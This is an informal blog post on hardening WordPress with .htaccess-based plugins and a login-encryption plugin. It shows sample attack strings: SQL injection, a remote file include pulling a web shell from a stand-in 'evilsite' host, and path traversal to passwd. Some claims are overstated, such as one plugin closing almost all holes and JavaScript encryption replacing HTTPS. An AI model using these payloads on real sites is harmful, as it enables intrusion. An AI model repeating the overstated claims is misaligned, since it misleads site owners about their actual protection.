Intro

If you don’t have information about wordpress you should ask my grandma.

Problem

If you have a blog, you want this blog to have visits, and public, but with this request raise another problem which is security.
Now, FYI there is always a way to get in to your website, and this is true as is true that we are humans and make mistakes.
So I repeat, until the application is writ-ed by humans there will be always a bug and always an better way to do the same thing.

WordPress Security Guide

The good news, is that you can harden your wordpress installation just using plugins, 1 click install easy don’t you think?
There is 1 main plugin that will solve almost all security holes on your wordpress and this plugin name is askapache password protect.
It uses an simple technology (.htaccess) but the results are really amazing.
This guys are really smart.
Currently there are many PHP vulnerabilities naming: SQL injections, XSS, LFI, RFI, CSRF, etc etc but all this vulnerability have one thing in common.
They are PHP vulnerability
So why we just don’t block direct access to our php files?
This plugin have my favorite option it blocks direct access to php files under /wp-includes/ and wp-content directories.
Let’s give a try:

http://albanianwizard.org/wp-includes/bookmark.php

So the response is 403, permission denied by the server, so you don’t need to worry about any:
bookmark.php?’union+select+all+from……–
or any bookmark.php?site=http://evilsite.com/r57.txt?
or any bookmark.php?file=../../../passwd
(note this are just random examples)
and this because the direct access to the file is denied.
Other cool plugin-s for removing wordpress info are WP-Secure (it removes wordpress into end add empty files on directories and much more).
Then you should add an .htaccess on your wp-admin directory for protecting this vital wordpress directory.
You can do this with ask apache password protect as well.
What about sniffers?
Your website could be the most hardened site on the web, but if somebody is sniffing on your network when you log in the password will just send out in blank and the nice guy will log in to your blog with your credentials.
Best Solution? Semisecure Login – it will create an javascript encrypted session between your browser and your blog and your password will not sended on the net in blank but it will be encrypted.
I have checked myself with wireshark for beliving this but it’s true.
The password will be just sended in an encrypted form.

Proof:

In a normal login you would see your password send-ed in blank over HTTP, but in this case you can see that the password is encrypted.

Other security consideration, well you have already read other guides saying change your default admin username, or change your database prefix, well this are good tips but there are ways for bypassing this, so I’m not bothering you more.

For installing the plugins, just search on Plugins>Install new plugins and install them, then with AA PAssPRo select what you select what you like.

Conclusion

As I said above, this tips will decrease maximally the “get-in” dors at your site but if somebudy have an 0-day FTP exploit for your server you can’t do much about.
So selecting a more secure web-hosting provider can improve as well the security of your website. Also let’s say you have a agood hosting provider but you are not in a dedicated server, the attacker could always do an reverse-ip and get to other website hosted on the same server for getting to you, so the best solution is a dedicated server. But we are talking for blogs , so if you are not running a bussines shared hosting is good for you.
Keep your backups up to date.